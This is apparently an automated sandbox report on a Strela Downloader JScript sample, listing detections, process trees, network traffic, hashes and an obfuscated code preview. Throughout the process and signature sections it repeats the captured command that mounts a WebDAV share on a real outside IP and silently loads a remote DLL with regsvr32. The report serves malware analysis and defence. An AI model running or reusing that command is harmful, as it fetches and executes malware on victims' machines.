Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
22054200882739718047.js

Overview

General Information

Sample name:22054200882739718047.js
Analysis ID:1578100
MD5:60276d0417241af6df5453ce1b5fbfea
SHA1:0401512ef814c07e979291534dafa511ac29df3c
SHA256:8847da421261ec32685f06fb2e39f10ff44064c6366becfcf7b3f246c8b8cf4e
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 3528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2468 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6108 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 5260 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 3528JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3528.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", ProcessId: 3528, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 5260, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll, ProcessId: 2468, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js", ProcessId: 3528, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 5260, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 5260, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 22054200882739718047.jsVirustotal: Detection: 11%Perma Link

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
      Source: Joe Sandbox ViewIP Address: 193.143.1.231 193.143.1.231
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 00000005.00000002.2079287979.000001E583988000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078592033.000001E5839BC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078592033.000001E5839B1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078313855.000001E5839DA000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2079341296.000001E5839BC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2079341296.000001E5839B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 00000005.00000002.2079287979.000001E583988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/pace

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_3528.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3528, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 22054200882739718047.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal80.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 22054200882739718047.jsVirustotal: Detection: 11%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 6392Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000005.00000002.2079287979.000001E583988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@!
      Source: net.exe, 00000005.00000003.2078313855.000001E5839ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      22054200882739718047.js5%ReversingLabs
      22054200882739718047.js12%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://193.143.1.231:8888/0%Avira URL Cloudsafe
      http://193.143.1.231:8888/pace0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/pacenet.exe, 00000005.00000002.2079287979.000001E583988000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/net.exe, 00000005.00000002.2079287979.000001E583988000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078592033.000001E5839BC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078592033.000001E5839B1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2078313855.000001E5839DA000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2079341296.000001E5839BC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2079341296.000001E5839B1000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.143.1.231
      unknownunknown
      57271BITWEB-ASRUtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1578100
      Start date and time:2024-12-19 09:04:10 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 5s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:22054200882739718047.js
      Detection:MAL
      Classification:mal80.rans.troj.spyw.evad.winJS@8/0@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      03:05:04API Interceptor1x Sleep call for process: net.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.143.1.23118452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      BITWEB-ASRUhttps://courtscali.com/Get hashmaliciousUnknownBrowse
      • 193.143.1.14
      18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      qL619hzCfc.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      No context
      No context
      No created / dropped files found
      File type:ASCII text, with very long lines (65536), with no line terminators
      Entropy (8bit):4.933648892780531
      TrID:
        File name:22054200882739718047.js
        File size:129'417 bytes
        MD5:60276d0417241af6df5453ce1b5fbfea
        SHA1:0401512ef814c07e979291534dafa511ac29df3c
        SHA256:8847da421261ec32685f06fb2e39f10ff44064c6366becfcf7b3f246c8b8cf4e
        SHA512:a4c8a24698e518641959937c972997b0d7e19dd2443f1f9051f922e78d944a516c98b5102de14ea0e521f5e33679dd9b468315fb77506da6a75d7d707159a284
        SSDEEP:1536:u28LvSaZhzI2qnd1SGSuxlt+uI0A6yLIeLJf8GlRPakDusP6KfYAXi8pfj/ADQt9:4AR45LTx/xtRke
        TLSH:B1C362891A8B0773415FC829931FD3B6E95DC06E222E97C63C714D491D66E3CCEAAB70
        File Content Preview:function qxglwepg(){this[ygasxf+dotys+naxxywka+wkberlu](qtzkmwok+xnnecn+byyzxmvm+sxvtwic+aoagfcd+vwhfatio+ygasxf+zbnovawvo+zbnovawvo+uiwhaets+dotys+wehru+dzclred+byyzxmvm+byyzxmvm+jbvquzjp+ygasxf+jbvquzjp+uajtofnb+xobrf+dzclred+wkberlu+lcoqrwvog+uajtofnb+
        Icon Hash:68d69b8bb6aa9a86
        TimestampSource PortDest PortSource IPDest IP
        Dec 19, 2024 09:05:03.963895082 CET497048888192.168.2.5193.143.1.231
        Dec 19, 2024 09:05:04.084671974 CET888849704193.143.1.231192.168.2.5
        Dec 19, 2024 09:05:04.084784031 CET497048888192.168.2.5193.143.1.231
        Dec 19, 2024 09:05:04.085012913 CET497048888192.168.2.5193.143.1.231
        Dec 19, 2024 09:05:04.204958916 CET888849704193.143.1.231192.168.2.5
        Dec 19, 2024 09:05:05.497523069 CET888849704193.143.1.231192.168.2.5
        Dec 19, 2024 09:05:05.545397997 CET497048888192.168.2.5193.143.1.231
        Dec 19, 2024 09:05:05.693633080 CET497048888192.168.2.5193.143.1.231
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549704193.143.1.23188885260C:\Windows\System32\net.exe
        TimestampBytes transferredDirectionData
        Dec 19, 2024 09:05:04.085012913 CET107OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: DavClnt
        translate: f
        Host: 193.143.1.231:8888
        Dec 19, 2024 09:05:05.497523069 CET237INHTTP/1.1 500 Internal Server Error
        Server: nginx/1.22.1
        Date: Thu, 19 Dec 2024 08:05:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 22
        Connection: keep-alive
        X-Content-Type-Options: nosniff
        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
        Data Ascii: Internal server error


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:03:05:02
        Start date:19/12/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\22054200882739718047.js"
        Imagebase:0x7ff6eeb10000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:03:05:03
        Start date:19/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\104092144110800.dll
        Imagebase:0x7ff7ac2f0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:03:05:03
        Start date:19/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:03:05:03
        Start date:19/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff7ac2f0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:03:05:03
        Start date:19/12/2024
        Path:C:\Windows\System32\net.exe
        Wow64 process (32bit):false
        Commandline:net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff730d60000
        File size:59'904 bytes
        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly